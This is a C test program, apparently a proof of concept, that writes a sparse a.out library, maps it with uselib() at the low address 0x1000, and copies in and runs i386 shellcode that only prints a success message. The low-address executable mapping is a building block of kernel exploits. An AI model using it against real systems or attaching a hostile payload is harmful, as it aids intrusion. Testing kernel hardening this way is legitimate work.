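/*
 * Test program: builds a sparse a.out-style library file, asks the kernel to
 * map it with uselib(2) at a fixed low address, copies a small machine-code
 * stub to that address and calls it. The stub only prints " [+] success".
 *
 * NOTE(review): the stub is i386 code and the header uses `long` fields, so
 * this is presumably meant to be built and run as a 32-bit x86 binary; confirm.
 */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Address stored in the header's entry field; the stub is later copied here. */
#define loadaddr 0x00001000
/* Size of the library file on disk, also used as the header's text size. */
#define memsize (1<<20)

static const char *libname = "lib.a.out";

/*
 * Header written at offset 0 of the library file. 0314 is the a.out QMAGIC
 * value. Fields not named in the initializer (data, bss, syms) are zero.
 * NOTE(review): this only lines up with the 32-bit a.out exec header where
 * `long` is 4 bytes; confirm the target ABI.
 */
static struct {
	long magic, text, data, bss, syms, entry;
} hdr = {
	.magic = 0314,
	.text = memsize,
	.entry = loadaddr
};

/*
 * i386 stub followed by the message it prints. It sets eax=4, ebx=1, uses a
 * jmp/call/pop sequence to get the address of the trailing string into ecx,
 * sets edx=13 (the message length), issues int 0x80 and returns to the caller,
 * i.e. a write of the 13-byte message to descriptor 1.
 */
static char sc[] =
	"\x31\xd2\x8d\x42\x04\x8d\x5a\x01\xeb\x07\x59\x83\xc2\x0d\xcd\x80\xc3\xe8\xf4\xff\xff\xff [+] success\n";

/*
 * Create the library file, load it with uselib(), run the stub from the
 * mapped address, then remove the file.
 *
 * Returns 0 when every step succeeded and 1 when any step failed, so that a
 * wrapper script can tell "mapping refused" apart from "mapping accepted".
 */
int main(void)
{
	int fd;
	int rc = 1;

	fd = open(libname, O_CREAT | O_RDWR | O_TRUNC, 0755);
	if (fd == -1) {
		perror("open lib");
		return rc;
	}

	/* Header first, then one byte at memsize - 1 so the file is memsize
	 * bytes long without writing the whole range. Each step is checked:
	 * a truncated file would make a later uselib() result meaningless. */
	if (write(fd, &hdr, sizeof(hdr)) != (ssize_t)sizeof(hdr)) {
		perror("write header");
		close(fd);
		goto del;
	}
	if (lseek(fd, memsize - 1, SEEK_SET) == (off_t)-1) {
		perror("lseek");
		close(fd);
		goto del;
	}
	if (write(fd, "x", 1) != 1) {
		perror("write tail");
		close(fd);
		goto del;
	}
	if (close(fd) == -1) {
		perror("close lib");
		goto del;
	}
	printf(" [+] wrote library file\n");

	/* NOTE(review): uselib() is not declared by the headers above and may
	 * have no libc wrapper on current systems; kernels built without
	 * uselib/a.out support are expected to reject the call. Confirm on the
	 * target before relying on the result. */
	if (uselib(libname)) {
		perror("uselib");
		goto del;
	}
	printf(" [+] loaded library\n");

	/* Writes to a fixed address: this relies on uselib() having mapped
	 * writable, executable memory at hdr.entry. If it did not, the process
	 * faults here instead of reporting an error. */
	memcpy((void *)hdr.entry, sc, sizeof(sc));
	printf(" [+] wrote shellcode\n");

	((void (*)(void))hdr.entry)();
	rc = 0;

del:
	unlink(libname);
	return rc;
}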